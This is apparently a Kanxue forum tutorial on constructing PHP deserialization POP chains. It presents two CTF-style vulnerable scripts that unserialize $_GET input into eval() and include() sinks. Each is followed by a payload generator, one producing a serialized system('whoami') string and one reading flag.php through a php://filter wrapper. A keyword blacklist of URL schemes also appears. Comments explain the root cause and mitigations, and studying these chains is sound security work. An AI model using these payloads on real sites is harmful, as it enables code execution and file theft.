POP链构造学习心得
![](https://imgs.knowsafe.com:8087/img/imgsaideep/0xu/2021/1/20/33f1809efeed0f0920ba2ba3e893566e.jpg)
本文为看雪论坛优秀文章
看雪论坛作者ID:H3h3QAQ
POP链基础
一
POP和POP链的定义
1、什么是POP
2、POP链原理
二
POP链构造初探
1、简单的POP链构造三部曲
// Discloses this script's own source to the visitor (CTF convention). The
// actual weakness is the unserialize() call at the end of the script.
show_source(__FILE__);
// Entry point of the chain: a Lemon holds one object in $a and calls
// action() on it from its destructor, without checking which class $a is.
class Lemon {
// Protected, but still part of the serialized form (encoded with the
// "\0*\0" name prefix), so unserialize() can populate it with any object.
protected $a;
// Not invoked by unserialize(); the H3 default only applies to objects
// created with new.
function __construct() {
$this->a = new H3();
}
// Runs when the object is destroyed, which also happens for objects
// produced by unserialize() once they go out of scope.
function __destruct() {
$this->a->action();
}
}
// The intended, harmless target of Lemon::__destruct().
class H3 {
function action() {
echo "I want to play basketball!";
}
}
// Contains a code-execution sink: eval() over a property value. The method
// is named H3, so the call to action() in Lemon::__destruct() does not
// resolve to it as written.
class Hack {
// Private, so it serializes with the "\0Hack\0" name prefix and is still
// settable through unserialize().
private $data;
// eval() on stored data is unsafe however it is reached; the defensive fix
// is to remove the eval(), not to rely on the method name.
function H3() {
eval($this->data);
}
}
// Root cause: deserializing request-controlled input instantiates any class
// defined in this file with caller-chosen property values, after which PHP
// runs their magic methods (__wakeup, __destruct, ...). Mitigation: never
// unserialize() request data; prefer json_decode(), or at minimum
// unserialize($s, ['allowed_classes' => false]).
unserialize($_GET['eval']);
__destruct()://析构函数当对象被销毁时会被自动调用
__wakeup(): //unserialize()时会被自动调用
__invoke(): //当尝试以调用函数的方法调用一个对象时,会被自动调用
__call(): //在对象上下文中调用不可访问的方法时触发
__callStatic(): //在静态上下文中调用不可访问的方法时触发
__get(): //用于从不可访问的属性读取数据
__set(): //用于将数据写入不可访问的属性
__isset(): //在不可访问的属性上调用isset()或empty()触发
__unset(): //在不可访问的属性上使用unset()时触发
__toString(): //把类当作字符串使用时触发
__construct(): //构造函数,当对象new的时候会自动调用,但在unserialize()时不会自动调用
__sleep(): //serialize()函数会检查类中是否存在一个魔术方法__sleep() 如果存在,该方法会被优先调用
// Chain entry point: the destructor calls action() on whatever object $a
// holds; the class of $a is never checked.
class Lemon {
// Protected members are still serialized ("\0*\0a"), so unserialize() can
// place any object here.
protected $a;
// Runs for new only, never for unserialize().
function __construct() {
$this->a = new H3();
}
// Runs on destruction, including for objects created by unserialize().
function __destruct() {
$this->a->action();
}
}
// Variant in which the eval() sink is reachable: action() is exactly the
// method Lemon::__destruct() calls on $a, so a Lemon whose $a is a Hack
// evaluates $data when the Lemon is destroyed.
class Hack {
// Private; serialized under the "\0Hack\0data" name.
private $data;
// Code-execution sink over a deserializable property.
function action() {
eval($this->data);
}
}
// Local stub used only to produce a serialized string. serialize() records
// the class name and property values, never method bodies, so the stub only
// has to match the target's class name, property name and visibility.
class Lemon {
protected $a;
function __construct() {
$this->a = new Hack();
}
}
// Stub for Hack: the only thing that reaches the serialized string is the
// private $data value, keyed as "\0Hack\0data".
class Hack {
private $data="system('whoami');";
}
// Serialize the nested objects and URL-encode the result: the names of
// protected/private properties contain NUL bytes, which cannot be written
// literally into a query string.
$a=new Lemon();
echo urlencode(serialize($a));
O%3A5%3A%22Lemon%22%3A1%3A%7Bs%3A4%3A%22%00%2A%00a%22%3BO%3A4%3A%22Hack%22%3A1%3A%7Bs%3A10%3A%22%00Hack%00data%22%3Bs%3A17%3A%22system%28%27whoami%27%29%3B%22%3B%7D%7D
![](https://imgs.knowsafe.com:8087/img/chayuqing/2023/1/8/d7a4c6ca0f18f16690091b2b721a0c81.png)
2、CTF题目中的POP链构造
// File-inclusion sink: append() includes whatever path is in $value, and
// __invoke() feeds it the protected $var property, which unserialize() can
// populate.
class Modifier {
protected $var;
// include() of a non-constant path is a file-inclusion primitive; php://
// stream wrappers are honoured by include() as well.
public function append($value){
include($value);
}
// Triggered when the object is called as a function, e.g. $obj().
public function __invoke(){
$this->append($this->var);
}
}
class Show{
public $source;
public $str;
// Runs on new only, not on unserialize().
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
// Triggered when the object is used as a string. Reading ->source on $str
// goes through that object's __get() when it has no such property.
public function __toString(){
return $this->str->source;
}
// Triggered by unserialize(). The guard only inspects $source with a
// keyword blacklist; if $source is an object, preg_match() string-converts
// it, which invokes that object's __toString(), so the check itself can
// hand control to another object. $str and nested objects are not
// validated at all. A __wakeup() filter cannot make unserialize() of
// untrusted input safe; the fix is not to deserialize it.
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
class Test{
public $p;
// Not run on unserialize(), so $p is not guaranteed to be an array.
public function __construct(){
$this->p = array();
}
// Reads of undefined properties land here; $p is then called as a
// function, which for an object means its __invoke() runs.
public function __get($key){
$function = $this->p;
return $function();
}
}
// Sink: request-controlled data is deserialized, and @ hides any warning a
// malformed or unexpected payload would otherwise raise. Mitigation:
// json_decode(), or unserialize($s, ['allowed_classes' => false]).
if(isset($_GET['pop'])){
@unserialize($_GET['pop']);
}
else{
$a=new Show;
highlight_file(__FILE__);
}
// End of the chain: include() of a property-controlled path, reached when
// the object is called as a function.
class Modifier {
// Protected; still deserializable (name "\0*\0var").
protected $var;
// File-inclusion sink.
public function append($value){
include($value);
}
// Triggered when the object is invoked like a function.
public function __invoke(){
$this->append($this->var);
}
}
class Show{
public $source;
public $str;
// Runs on new only; unserialize() does not call it.
public function __construct($file='index.php'){
$this->source = $file;
echo 'Welcome to '.$this->source."<br>";
}
// Triggered when the object is used as a string; the property read on
// $str falls through to $str's __get() if the property does not exist.
public function __toString(){
return $this->str->source;
}
// Triggered by unserialize(). preg_match() string-converts an object
// $source, which runs its __toString(); the blacklist neither stops that
// nor validates $str. Deserialization of untrusted input cannot be made
// safe by a check here.
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
}
// Excerpt of Show::__wakeup(): the first hook that runs on unserialize().
// preg_match() needs a string, so an object in $source is converted via
// its __toString() before the blacklist is even evaluated.
public function __wakeup(){
if(preg_match("/gopher|http|file|ftp|https|dict|\.\./i", $this->source)) {
echo "hacker";
$this->source = "index.php";
}
}
// Excerpt of Show::__toString(): reading ->source on $str triggers $str's
// __get() when that class has no such property.
public function __toString(){
return $this->str->source;
}
// Excerpt of Test::__get(): $p is called as a function, so an object in $p
// has its __invoke() run. $key is ignored.
public function __get($key){
$function = $this->p;
return $function();
}
// Excerpt of Modifier: __invoke() passes the deserializable $var to
// include(), the file-inclusion sink at the end of the chain.
class Modifier {
protected $var;
public function append($value){
include($value);
}
// Runs when the object is called like a function.
public function __invoke(){
$this->append($this->var);
}
}
// Stub for Modifier: only the protected $var value is serialized (keyed
// "\0*\0var"); the method bodies live in the target application.
class Modifier {
protected $var = "php://filter/convert.base64-encode/resource=flag.php";
}
// Stub for Show with the same public properties as the target. Methods are
// not serialized, so the constructor and __toString() here only affect the
// local script, not the produced string.
class Show{
public $source;
public $str;
public function __construct($file){
$this->source = $file;
}
public function __toString(){
return "H3";
}
}
// Stub for Test: $p is set to a Modifier so the serialized Test carries a
// Modifier object in its public property.
class Test{
public $p;
public function __construct(){
$this->p = new Modifier();
}
}
// Nest the objects: the outer Show's $source is the inner Show $a, whose
// $str is a Test holding a Modifier. URL-encoding is needed because
// protected property names contain NUL bytes.
$a = new Show(' ');
$a->str= new Test();
$h3 = new Show($a);
echo urlencode(serialize($h3));
![](https://imgs.knowsafe.com:8087/img/chayuqing/2023/1/8/0027c21f837ddfd4205a1122d1218599.png)
![](https://imgs.knowsafe.com:8087/img/chayuqing/2023/1/8/d32834c1e019cb7221d62f889e3e1a26.png)
3、真实环境下的POP链构造
三
总结
看雪ID:H3h3QAQ
https://bbs.kanxue.com/user-home-921448.htm
![](https://imgs.knowsafe.com:8087/img/chayuqing/2023/1/8/5c7cf5c0b7af0230fe01b5ea0848cdd7.jpg)